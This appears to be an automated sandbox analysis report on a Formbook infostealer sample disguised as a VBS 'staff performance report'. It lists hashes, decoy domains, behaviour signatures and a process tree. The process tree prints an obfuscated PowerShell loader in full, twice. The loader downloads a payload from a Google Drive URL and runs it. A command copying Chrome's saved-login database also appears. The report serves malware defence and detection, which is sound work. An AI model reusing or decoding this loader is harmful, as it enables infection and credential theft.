Analysis

  • max time kernel
    146s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-06-2024 06:06

General

  • Target

    Staff performance report..vbs

  • Size

    1.1MB

  • MD5

    d3e2b3429359297758743cc96d94af79

  • SHA1

    70687fb4c366b1a95a651536a4e7270ae4a0382f

  • SHA256

    ea06432b0fe0200a91d19856ff8c0a24fc6bbb52c7ba49f6309555ac7d6797ea

  • SHA512

    f4662459f8315bd6f410bb586bc6c246d8b9a1b2d519ed0852b566fd9bb9a5e76ac8c2994a4bc1443391ae451a39d50b90f81ba953c57ff55c50d6f6e38ab9de

  • SSDEEP

    12288:W31cvBzbU01qal638iNX3iTMgmuYtWN/ZgMiQPeRjLL:WYz64+2SjX

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

sh31

Decoy

eegstudya-neuroeobc.com

hairbygeorginac.com

madeat.work

datalakeflow.com

hnhuamu.com

masterlynn.com

cartingclubcity.com

desototo.com

pudgyverse.app

wealththroughtransformation.com

gloria-grace.com

bqshuw.com

fmmob.com

ytrom.xyz

boga77.lol

22143.vip

whiskeyandwaters.com

ascogentgo.com

dcshoespascher.com

ozphilmarket.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook payload 3 IoCs
  • Adds policy Run key to start application 2 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3436
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Staff performance report..vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2248
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Adolph = 1;Function Upher($Stersbys){$Hexadecimalkoder=$Stersbys.Length-$Adolph;$Damehatteskygge105='Substring';For( $Overstraitly=7;$Overstraitly -lt $Hexadecimalkoder;$Overstraitly+=8){$Tjekkernes+=$Stersbys.$Damehatteskygge105.Invoke( $Overstraitly, $Adolph);}$Tjekkernes;}function Frkapslers($Mastotympanic){ & ($Basunisterne) ($Mastotympanic);}$Udsparing=Upher 'AnomorhMKostebao LudwikzUdmugnii Regni.l.ersemilLseklasaKritike/Gasbeto5 reseda. onosip0O,tfort Rec,nfi(TandkliWA.umrooiLillebrn ,ommundKlargreoIntoxi,wKulhusssBeskres .ovendeN Mukr,gTKrystal Forho.d1 Rensni0avancem. Kraget0Leucope;Vaskeru DoubtsWChockabiGrievabnStrandr6Uns arl4 Drj.er;Sammens Dilettaxpostg.a6Teleigl4Pol ure; Sangfo BoligomrF.rsirivUrethri:C.llarw1 Bandbu2 Ggemme1Cli.fli. B.dger0terrori)Cul,erk hepatiG ApperceDesignlc,jumrenkRagarepoSkraare/vem.dig2 Z.olog0Billard1Middenr0Souchon0Robotiz1 Bau,ki0 miaved1Underre RamaskFLokalraiCaly,sorEvaluate AsservfpulvereoS.ackedxAlterne/U sigel1Tarokke2T issen1Espelve.L,siafm0Lakeren ';$Risorial=Upher 'UnodiouUConverts Su,sereIrratiorUndlade- I.edenAUnd,lyegperleraePottagynCormogetRequite ';$Acetoxim=Upher 'combinahAntol,gtSvenskhtKollegipOversensM,rgavi:Flngeng/Andelsb/ SlightdStraaler Str.bii StaurovSkamfileSkatteg.firedesgspaadomoNordflooPrin,ipgThalamilSikkerheStatsbe.Indkbsac.agfreroCeramicmJigg,rm/fortykkuBred.aac Canton? lreboge.ranspexAmylacepVindskaoBrasswor Flexuotinoppor=P,cocurdProctodo HkledewBrd etsnBidragslFacadaloKaldsekalefselkdImproba&BundholiPengeindIdealis= Tankst1 NonsubpCamisadgRigsbibnK,netop6FirhjulO Re.ompSUnsusp,4 HypokoDCongel.DBok.palsDumhedeFagape,pd malleao TranchjP.nsionlhip,ybeo ekursiBudtraadgTolkni.t addelkn Gentag2Gengivez Gree sbU hulenJAllwortU ProsypBKaffest2PianetaDKomplexa.isvalu5TvesproM Skonn,_Oculis. ';$Termostatregulerede=Upher ' Ce,sef>Du peka ';$Basunisterne=Upher 'igdras,iUnpervae Est,ndxData.as ';$Mi='Okkerskader75';$Gordiacean = Upher 'Mongrele Fl.rercKonkurshslngkapoIm,itte Daahind%Unimpr,aPeriderpBussenspReroofed UndeviaMichailtWolfiegaP.eudog%Populat\apostroLOprrsomoLedigtbvCur lesfInterlesSmergeltHaemospean iocalMusikkos Sovevre Appelar.auzily.EnchantSDer enplUroluteaCuscuta The bro&Sk.svis& Pr.erv RetrogeunderpacRebeauth manvanoVoyaged .aabelit Tv ngs ';Frkapslers (Upher 'Kazitri$RotogragBeskyttlGenpartoTownsenbinterspaDedimusl Owl kl:WhoofinPShel.feaUnfeeblrTvrtimoaRationalDovelikdOverca.eF,isonshBraidiny,ulfovadCo oniaeFyrr ko=Mewcoul(CheeseccIntercem AntedadTicsf,a Ca,make/ProcentcAarrkke Saarhe$KernetrGFilo,ofoDiakac r ,raakldFo,kevii p rmisaLyttledcDiplocoeKampagnaBatwaemnKlnedeb)Fee,bac ');Frkapslers (Upher 'Metag.n$Exci,ovgFecalsylunvoracoGe,tlinbDimensia UncloulMennesk:VenlighKP.anetarUddanneoRen,dyrk A.bejdePapirbirMaale,oeButtr.s= Kontin$Skatt aA SubconcAnstifteMonotomtPromarro D gtcyxTagskgoiUnachinmParenth. NedstisBeeblebp asbestltre.lemiLgfolk.tWoolf,l( Prales$ SociolTDiv.taceLufthavrFirmanamI.ogameoKv rtersMiljakttFabricaaP stpaltV,getarrcol ecte haandkgeriksonuSubsultlAfkry,seVandflyrAnaunt,edobbeltdSlettepeS,edbro)Bekrftm ');$Acetoxim=$Krokere[0];$Indkbsfunktionen= (Upher 'Kollati$MouzahdgShag.obl MalacooEnlivenb Bloms a paymaslActua,y: KerterICrenulanqu.stiodBoyausdt Afst,mgSigbjrntFremti,sKlippengFulderirHumorleuConcretnCoyoterd MoedtolFejlma a.rmkrftgDascha 1Reffoas7Endevrd5differe=DiffereNIs.belleStevel,wVacuous-Pseud.cOGorbresb Ter inj.yperideFik ionc fnakketRevital PointbeSF rodiayAn,eldesFussl.stSmidigheAand romGinkbra. An tikNGynocraeJasperotdugenes.Pro idiWBind,tre Industb SabellCWorkt.blLissotriGipsplaeA,achnineftertat');$Indkbsfunktionen+=$Paraldehyde[1];Frkapslers ($Indkbsfunktionen);Frkapslers (Upher 'Handels$RappellI Invalinbrasilid rintitfritjofg ManicutForsmgts PraesygSarcos.rStn,lapuIndlaannP,interdUkorreklRespondaTensorpgFor.den1Over he7Analys 5Metaxyl.T,enageHde,meste PyloriaStrainedNarrevreMilda,trStaurotsOverabl[ elesel$ DutiesRFeltra,iE,purgasneologioTidaslor.kkerbii Maj,riaPaandtelObelism]Slvlams=Fintlli$BettingU FalsemdExodromsMetaphopChemicoaDisgorgrD,tskrui elvfornForspeagKlamre, ');$Biblicist=Upher 'Benumbs$Logist I GennemnFor,knid BetegntLgemidlgPianettt Spndess SymmetgBan,etsr Mindreu Ves,cunSterlindRefrustlValour.a FtpedvgAbsol,t1Gilledt7 U,seve5Amberfi.Bowkr nD Fi,senoRiksmaaw am.ternVirk,lylSatispaoU,pincraHaandk dDiaca,tFLateropi.nastomlAgendereTmrerme(,aardef$ Tndes.A MejslicButtreseDarenfot Befu,doScandiaxElectroishoqs,umTimuqua,lem ste$OrczombFAntholcoSi,nessrPresha.dGeissorrBoltyanaLa orataTnksommbStrows.eSubcode) Willow ';$Fordraabe=$Paraldehyde[0];Frkapslers (Upher 'Cathart$EupatrigUngainslBarbel.oBullwhibMllerieaCubandelGave,re:UnpresuPPseudoma BorumwrforsikraTilbagef Touch.eUforsrgrB sonokeAitiolodExaugure Ta,lea1Fleuret9Omst lb6 Thorfi=Transan( Part.rTGar.erke hallotsSvejtsitLanguor-LaconizPSidstepaBertolttTrashleh desper Bssend,$DialektFSiciliaoBroenderMelanosdEmbedsfrLageropaAdnexa,aIndsnusbCardioneEmbranc)Takkema ');while (!$Paraferede196) {Frkapslers (Upher 'Sadlym.$,aketbeg passiol Overblo Potho.b Phim,saDelm,enlDr ftsk:IntegraIDiglenocblikkentMillijoe AabenbsChe pentFo karl=Taskmis$All.viat s,agbarRamalu.u BlodpleUnconta ') ;Frkapslers $Biblicist;Frkapslers (Upher 'RadioviSFricti tSh,rulaaLokalplrUnderbot Ondule- Riden.STranspllSemim,seKoalitieEsterenpCyc,oid Lsebogc4Electro ');Frkapslers (Upher 'Prsi en$Stbeforg faareklkjo.enso ,iaisobLejekonaApologilAf,nitt:Dikta uP rmaata Stang.r Guids,aLr lystf ,pgoteeLynchinr JeweleeF mkrondNdsig aeOphtha 1Yashmak9Ernring6 ucentr=Frotteh(K.enfesTU.tuckoe Selskasmiaski.tHankena-WorniluPSalliskaHyp rbatApomorphTrolddo Dielect$ yderzoF PentosoBu noosrPol mandGrevesarantisemaKerwinnaChoks,abArithmoeCentesi) Offerv ') ;Frkapslers (Upher 'Bygning$MartyrmgMegalaclGirendeobupleurbTransska Akvam l U,eabi:S ovbunUSk bslad Geo,intOverscov Ren.eirGenistreRibbesmn Flerstd.achucheLigedan=Indflet$Aga.etig.nipolrlEf,erraoDenaturbMidfasta,klmernlFami.ie:Ins nuaPA chivooSup.rscd yrevogoVasercomNonculpeJohnsontNoninder PreseayLabiove+Ganloes+Barnagt%Vrdighe$Reli.uaKnonsubsrE spertoLyshaark NuttaleMentolsrSerumageStrikbl.Was tubcAmety,tokaarderuVarmefynVarsovitDeliber ') ;$Acetoxim=$Krokere[$Udtvrende];}$Barbery=293629;$Foes=30271;Frkapslers (Upher 'Chita.h$ BarbargBavoso,lHetero o .udivibSerig,aa Saarbal Optoge:Sa,gkorSRelumi tBjergvriKoleraevLastlyceSmouldel Ind aas G afikeMad.nnak GasdreoK rminrrEquidennEmpleadeAb,ogennfilo,speDamoetas Thiosu V scero= Electr Un onisGGallin eZantimptOutlab.- Sel,stCGransknoOutplean Tilb.gt sclepieRoulettnSerologtStammef Svible$O,thgleFGaelicioBordfylrAbnegatdOper,tirpowerpla OmnieraNightmeb PalleneHyphomy ');Frkapslers (Upher 'Hivenes$ Kileysgsyzy,iulPaab,dtoBetnkesbPhytokiamiddelklcusto,i: UdmagrBInputteoMucocutpEpidem,lsejlmags UrocyskBlodsugoBrnebogmMon nermPaakrseuDomnersnBeslagle depletrHo petf Demici =Glycera Unre uc[P,ogramS Solstry.ellebasNobeliutPikantceSqudgyemGlissad.RedningCSpyflueo DaggednDe.trucvEt,ereneSold.tprUnclasstGrafisk]cys.ost:Constan:SkibsstFJackn frInventaoTrave,umGiroensBTrianguaf.acrels SkridseBeskikn6Salient4 ScoopeS Lnram.tUnsubverAr,asrii KliomenVelgrengUgennem(Modific$Ek propSAstr,ngtGakfauniM,dpostvhensynse HdersmlMincings Le,dwaeMealierkMisde loOmlaster Ciffern le.staeTeutophnNonth,ie MarginsUnconta)Tammany ');Frkapslers (Upher ' social$Cosm.nag hloromlPlunderoTuttenubBloodieaBrsspeklPersie,:,nadvanRSkjortei Ny estv Pikan aSalderelMaks maiForml ssDemo ineC.polatrOstensoitar espnRisala gSttteo. P,eudos=Dise th Tal iat[AmbuscaSLeveranyNie erssJderpantCompu,eeNiz.matm earscr. procesTFimbr,leFlers rxPeulvantIndkass.PeriodeEVerifiknL.erskacTitian oPolyododDeformiiHensig,nTheronegKartote] Refrnu:Servede:.ourgeoASammensSErichtoCSkamlseIZardozbIKuaraph.Hydro.yGCharacte Pon,ertGravsnkSPahhoustOxygenerPhysicsiHaandspnSilkelrgtilli,s(Gothici$modemasBSvrhedcoHyd.topp ediskolExt,apos EliesakMil,euroPhosphomPullovemStakladuMa.krennPricklyeSvungnerFrivoli)Kontinu ');Frkapslers (Upher 'gtehust$Ship,argDruggi,lHered toUnsteekblweisspaOpsig.ll.eglvrk:AfskrinOTekstrkoReposoimSympatiyZoolsapc AzonapePersonntCarbinyo Muco uuEklipses Haplop=Arinaad$BaydakoR,ohammeiSpildervUdfal.saTempusel Nordsti.entralsPrimroseArbejdsrSmreoliiBdeudmanSabelkagSku per.Bismages ciagrauParticib alf idsAnoma,otReindeprDo.inikiS perimnIchthyogFolk.mu(Tha ato$IndstrmBExcuderaAnazotur antwibTa.aloneKra brsrMo.adseyUn,easu,Schemat$CoshareFTri utto ascapeeFenmantsOverhjh)Uddista ');Frkapslers $Oomycetous;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1520
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lovfstelser.Sla && echo t"
          4⤵
            PID:2420
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Adolph = 1;Function Upher($Stersbys){$Hexadecimalkoder=$Stersbys.Length-$Adolph;$Damehatteskygge105='Substring';For( $Overstraitly=7;$Overstraitly -lt $Hexadecimalkoder;$Overstraitly+=8){$Tjekkernes+=$Stersbys.$Damehatteskygge105.Invoke( $Overstraitly, $Adolph);}$Tjekkernes;}function Frkapslers($Mastotympanic){ & ($Basunisterne) ($Mastotympanic);}$Udsparing=Upher 'AnomorhMKostebao LudwikzUdmugnii Regni.l.ersemilLseklasaKritike/Gasbeto5 reseda. onosip0O,tfort Rec,nfi(TandkliWA.umrooiLillebrn ,ommundKlargreoIntoxi,wKulhusssBeskres .ovendeN Mukr,gTKrystal Forho.d1 Rensni0avancem. Kraget0Leucope;Vaskeru DoubtsWChockabiGrievabnStrandr6Uns arl4 Drj.er;Sammens Dilettaxpostg.a6Teleigl4Pol ure; Sangfo BoligomrF.rsirivUrethri:C.llarw1 Bandbu2 Ggemme1Cli.fli. B.dger0terrori)Cul,erk hepatiG ApperceDesignlc,jumrenkRagarepoSkraare/vem.dig2 Z.olog0Billard1Middenr0Souchon0Robotiz1 Bau,ki0 miaved1Underre RamaskFLokalraiCaly,sorEvaluate AsservfpulvereoS.ackedxAlterne/U sigel1Tarokke2T issen1Espelve.L,siafm0Lakeren ';$Risorial=Upher 'UnodiouUConverts Su,sereIrratiorUndlade- I.edenAUnd,lyegperleraePottagynCormogetRequite ';$Acetoxim=Upher 'combinahAntol,gtSvenskhtKollegipOversensM,rgavi:Flngeng/Andelsb/ SlightdStraaler Str.bii StaurovSkamfileSkatteg.firedesgspaadomoNordflooPrin,ipgThalamilSikkerheStatsbe.Indkbsac.agfreroCeramicmJigg,rm/fortykkuBred.aac Canton? lreboge.ranspexAmylacepVindskaoBrasswor Flexuotinoppor=P,cocurdProctodo HkledewBrd etsnBidragslFacadaloKaldsekalefselkdImproba&BundholiPengeindIdealis= Tankst1 NonsubpCamisadgRigsbibnK,netop6FirhjulO Re.ompSUnsusp,4 HypokoDCongel.DBok.palsDumhedeFagape,pd malleao TranchjP.nsionlhip,ybeo ekursiBudtraadgTolkni.t addelkn Gentag2Gengivez Gree sbU hulenJAllwortU ProsypBKaffest2PianetaDKomplexa.isvalu5TvesproM Skonn,_Oculis. ';$Termostatregulerede=Upher ' Ce,sef>Du peka ';$Basunisterne=Upher 'igdras,iUnpervae Est,ndxData.as ';$Mi='Okkerskader75';$Gordiacean = Upher 'Mongrele Fl.rercKonkurshslngkapoIm,itte Daahind%Unimpr,aPeriderpBussenspReroofed UndeviaMichailtWolfiegaP.eudog%Populat\apostroLOprrsomoLedigtbvCur lesfInterlesSmergeltHaemospean iocalMusikkos Sovevre Appelar.auzily.EnchantSDer enplUroluteaCuscuta The bro&Sk.svis& Pr.erv RetrogeunderpacRebeauth manvanoVoyaged .aabelit Tv ngs ';Frkapslers (Upher 'Kazitri$RotogragBeskyttlGenpartoTownsenbinterspaDedimusl Owl kl:WhoofinPShel.feaUnfeeblrTvrtimoaRationalDovelikdOverca.eF,isonshBraidiny,ulfovadCo oniaeFyrr ko=Mewcoul(CheeseccIntercem AntedadTicsf,a Ca,make/ProcentcAarrkke Saarhe$KernetrGFilo,ofoDiakac r ,raakldFo,kevii p rmisaLyttledcDiplocoeKampagnaBatwaemnKlnedeb)Fee,bac ');Frkapslers (Upher 'Metag.n$Exci,ovgFecalsylunvoracoGe,tlinbDimensia UncloulMennesk:VenlighKP.anetarUddanneoRen,dyrk A.bejdePapirbirMaale,oeButtr.s= Kontin$Skatt aA SubconcAnstifteMonotomtPromarro D gtcyxTagskgoiUnachinmParenth. NedstisBeeblebp asbestltre.lemiLgfolk.tWoolf,l( Prales$ SociolTDiv.taceLufthavrFirmanamI.ogameoKv rtersMiljakttFabricaaP stpaltV,getarrcol ecte haandkgeriksonuSubsultlAfkry,seVandflyrAnaunt,edobbeltdSlettepeS,edbro)Bekrftm ');$Acetoxim=$Krokere[0];$Indkbsfunktionen= (Upher 'Kollati$MouzahdgShag.obl MalacooEnlivenb Bloms a paymaslActua,y: KerterICrenulanqu.stiodBoyausdt Afst,mgSigbjrntFremti,sKlippengFulderirHumorleuConcretnCoyoterd MoedtolFejlma a.rmkrftgDascha 1Reffoas7Endevrd5differe=DiffereNIs.belleStevel,wVacuous-Pseud.cOGorbresb Ter inj.yperideFik ionc fnakketRevital PointbeSF rodiayAn,eldesFussl.stSmidigheAand romGinkbra. An tikNGynocraeJasperotdugenes.Pro idiWBind,tre Industb SabellCWorkt.blLissotriGipsplaeA,achnineftertat');$Indkbsfunktionen+=$Paraldehyde[1];Frkapslers ($Indkbsfunktionen);Frkapslers (Upher 'Handels$RappellI Invalinbrasilid rintitfritjofg ManicutForsmgts PraesygSarcos.rStn,lapuIndlaannP,interdUkorreklRespondaTensorpgFor.den1Over he7Analys 5Metaxyl.T,enageHde,meste PyloriaStrainedNarrevreMilda,trStaurotsOverabl[ elesel$ DutiesRFeltra,iE,purgasneologioTidaslor.kkerbii Maj,riaPaandtelObelism]Slvlams=Fintlli$BettingU FalsemdExodromsMetaphopChemicoaDisgorgrD,tskrui elvfornForspeagKlamre, ');$Biblicist=Upher 'Benumbs$Logist I GennemnFor,knid BetegntLgemidlgPianettt Spndess SymmetgBan,etsr Mindreu Ves,cunSterlindRefrustlValour.a FtpedvgAbsol,t1Gilledt7 U,seve5Amberfi.Bowkr nD Fi,senoRiksmaaw am.ternVirk,lylSatispaoU,pincraHaandk dDiaca,tFLateropi.nastomlAgendereTmrerme(,aardef$ Tndes.A MejslicButtreseDarenfot Befu,doScandiaxElectroishoqs,umTimuqua,lem ste$OrczombFAntholcoSi,nessrPresha.dGeissorrBoltyanaLa orataTnksommbStrows.eSubcode) Willow ';$Fordraabe=$Paraldehyde[0];Frkapslers (Upher 'Cathart$EupatrigUngainslBarbel.oBullwhibMllerieaCubandelGave,re:UnpresuPPseudoma BorumwrforsikraTilbagef Touch.eUforsrgrB sonokeAitiolodExaugure Ta,lea1Fleuret9Omst lb6 Thorfi=Transan( Part.rTGar.erke hallotsSvejtsitLanguor-LaconizPSidstepaBertolttTrashleh desper Bssend,$DialektFSiciliaoBroenderMelanosdEmbedsfrLageropaAdnexa,aIndsnusbCardioneEmbranc)Takkema ');while (!$Paraferede196) {Frkapslers (Upher 'Sadlym.$,aketbeg passiol Overblo Potho.b Phim,saDelm,enlDr ftsk:IntegraIDiglenocblikkentMillijoe AabenbsChe pentFo karl=Taskmis$All.viat s,agbarRamalu.u BlodpleUnconta ') ;Frkapslers $Biblicist;Frkapslers (Upher 'RadioviSFricti tSh,rulaaLokalplrUnderbot Ondule- Riden.STranspllSemim,seKoalitieEsterenpCyc,oid Lsebogc4Electro ');Frkapslers (Upher 'Prsi en$Stbeforg faareklkjo.enso ,iaisobLejekonaApologilAf,nitt:Dikta uP rmaata Stang.r Guids,aLr lystf ,pgoteeLynchinr JeweleeF mkrondNdsig aeOphtha 1Yashmak9Ernring6 ucentr=Frotteh(K.enfesTU.tuckoe Selskasmiaski.tHankena-WorniluPSalliskaHyp rbatApomorphTrolddo Dielect$ yderzoF PentosoBu noosrPol mandGrevesarantisemaKerwinnaChoks,abArithmoeCentesi) Offerv ') ;Frkapslers (Upher 'Bygning$MartyrmgMegalaclGirendeobupleurbTransska Akvam l U,eabi:S ovbunUSk bslad Geo,intOverscov Ren.eirGenistreRibbesmn Flerstd.achucheLigedan=Indflet$Aga.etig.nipolrlEf,erraoDenaturbMidfasta,klmernlFami.ie:Ins nuaPA chivooSup.rscd yrevogoVasercomNonculpeJohnsontNoninder PreseayLabiove+Ganloes+Barnagt%Vrdighe$Reli.uaKnonsubsrE spertoLyshaark NuttaleMentolsrSerumageStrikbl.Was tubcAmety,tokaarderuVarmefynVarsovitDeliber ') ;$Acetoxim=$Krokere[$Udtvrende];}$Barbery=293629;$Foes=30271;Frkapslers (Upher 'Chita.h$ BarbargBavoso,lHetero o .udivibSerig,aa Saarbal Optoge:Sa,gkorSRelumi tBjergvriKoleraevLastlyceSmouldel Ind aas G afikeMad.nnak GasdreoK rminrrEquidennEmpleadeAb,ogennfilo,speDamoetas Thiosu V scero= Electr Un onisGGallin eZantimptOutlab.- Sel,stCGransknoOutplean Tilb.gt sclepieRoulettnSerologtStammef Svible$O,thgleFGaelicioBordfylrAbnegatdOper,tirpowerpla OmnieraNightmeb PalleneHyphomy ');Frkapslers (Upher 'Hivenes$ Kileysgsyzy,iulPaab,dtoBetnkesbPhytokiamiddelklcusto,i: UdmagrBInputteoMucocutpEpidem,lsejlmags UrocyskBlodsugoBrnebogmMon nermPaakrseuDomnersnBeslagle depletrHo petf Demici =Glycera Unre uc[P,ogramS Solstry.ellebasNobeliutPikantceSqudgyemGlissad.RedningCSpyflueo DaggednDe.trucvEt,ereneSold.tprUnclasstGrafisk]cys.ost:Constan:SkibsstFJackn frInventaoTrave,umGiroensBTrianguaf.acrels SkridseBeskikn6Salient4 ScoopeS Lnram.tUnsubverAr,asrii KliomenVelgrengUgennem(Modific$Ek propSAstr,ngtGakfauniM,dpostvhensynse HdersmlMincings Le,dwaeMealierkMisde loOmlaster Ciffern le.staeTeutophnNonth,ie MarginsUnconta)Tammany ');Frkapslers (Upher ' social$Cosm.nag hloromlPlunderoTuttenubBloodieaBrsspeklPersie,:,nadvanRSkjortei Ny estv Pikan aSalderelMaks maiForml ssDemo ineC.polatrOstensoitar espnRisala gSttteo. P,eudos=Dise th Tal iat[AmbuscaSLeveranyNie erssJderpantCompu,eeNiz.matm earscr. procesTFimbr,leFlers rxPeulvantIndkass.PeriodeEVerifiknL.erskacTitian oPolyododDeformiiHensig,nTheronegKartote] Refrnu:Servede:.ourgeoASammensSErichtoCSkamlseIZardozbIKuaraph.Hydro.yGCharacte Pon,ertGravsnkSPahhoustOxygenerPhysicsiHaandspnSilkelrgtilli,s(Gothici$modemasBSvrhedcoHyd.topp ediskolExt,apos EliesakMil,euroPhosphomPullovemStakladuMa.krennPricklyeSvungnerFrivoli)Kontinu ');Frkapslers (Upher 'gtehust$Ship,argDruggi,lHered toUnsteekblweisspaOpsig.ll.eglvrk:AfskrinOTekstrkoReposoimSympatiyZoolsapc AzonapePersonntCarbinyo Muco uuEklipses Haplop=Arinaad$BaydakoR,ohammeiSpildervUdfal.saTempusel Nordsti.entralsPrimroseArbejdsrSmreoliiBdeudmanSabelkagSku per.Bismages ciagrauParticib alf idsAnoma,otReindeprDo.inikiS perimnIchthyogFolk.mu(Tha ato$IndstrmBExcuderaAnazotur antwibTa.aloneKra brsrMo.adseyUn,easu,Schemat$CoshareFTri utto ascapeeFenmantsOverhjh)Uddista ');Frkapslers $Oomycetous;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4120
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lovfstelser.Sla && echo t"
              5⤵
                PID:2932
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                5⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of AdjustPrivilegeToken
                PID:3956
        • C:\Windows\SysWOW64\mstsc.exe
          "C:\Windows\SysWOW64\mstsc.exe"
          2⤵
          • Adds policy Run key to start application
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1556
          • C:\Windows\SysWOW64\cmd.exe
            /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
            3⤵
              PID:4360
            • C:\Program Files\Mozilla Firefox\Firefox.exe
              "C:\Program Files\Mozilla Firefox\Firefox.exe"
              3⤵
                PID:3504

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\DB1

            Filesize

            46KB

            MD5

            8f5942354d3809f865f9767eddf51314

            SHA1

            20be11c0d42fc0cef53931ea9152b55082d1a11e

            SHA256

            776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

            SHA512

            fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

          • C:\Users\Admin\AppData\Local\Temp\Exercite.txt

            Filesize

            1KB

            MD5

            a41f2c5cfb0df472d63f2b6d7d6d4e08

            SHA1

            6e00d2f5f6808f8f729a5c313aa5fa7de79004c0

            SHA256

            05be46c2f2a239721f62cffc450fc31ee6d79d47caa119c7cde83f0d974d6ffc

            SHA512

            9ba6c80dea1dd97e92ad804cd51e9fef98f6f2c3e16343982988837ebdc0e47991816f7f38175a0ccd981d1b02e87d1db50ef416e2278114306cfbaa38551541

          • C:\Users\Admin\AppData\Local\Temp\Exercite.txt

            Filesize

            1KB

            MD5

            1ea2c71c19c451aa0d2667d9919762fd

            SHA1

            e1dc2bde7e42d1d30593ba5ed2c6a144973769b8

            SHA256

            fee7d11e3c9be60290929a70de26a8114a2fad0cf6072002f291b54e9d66c4e8

            SHA512

            9eef37170f56366ceff6fd553a806eec7fe04e3c91fae36cf46c9c21bc1711d47d356c08e70e78269fdf1015ddb6685fbf498639b9f8e76fc214efc6557a8f22

          • C:\Users\Admin\AppData\Local\Temp\Exercite.txt

            Filesize

            2KB

            MD5

            a9712b2c51eea5709e5bd4478d8dac43

            SHA1

            900f7fb4e2849a964e67ebe18c7f49dd28f42603

            SHA256

            f76bfa9f1619f52ef5e0e7bea1289348e4d9aa57c2e52eb98781379a2f07ff2f

            SHA512

            375640e69d5088ddfb69a3499e66fd3458ad639f519779834521ea43408dfa27e74499b04b1617ada2e75fa21481c1457be40e45349ae8186ec10aa2ca65bdf9

          • C:\Users\Admin\AppData\Local\Temp\Exercite.txt

            Filesize

            5KB

            MD5

            10d5e74693b3a8e79957fd59668181fa

            SHA1

            214e06bec57fbabd303ef562836f2c1163fcb4ed

            SHA256

            d8c62c07ee315ecafd47ed37b38ed206ab5e7c8bb7f7accb2abaa317294d8648

            SHA512

            42dcfa776bbb6fc84e1488aa5678165031e394df73ce7a08571900d7f11c7339e6554bad2f78e956d16174339e7d7d83108380efe4b16c889983a918b8eacd00

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hns4nbkt.l0h.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\-Q8-CS12\-Q8logim.jpeg

            Filesize

            75KB

            MD5

            324b514999d72f12f66021bc60649fa8

            SHA1

            f2f4bbda0da7bca32abbe51080b662f430282af3

            SHA256

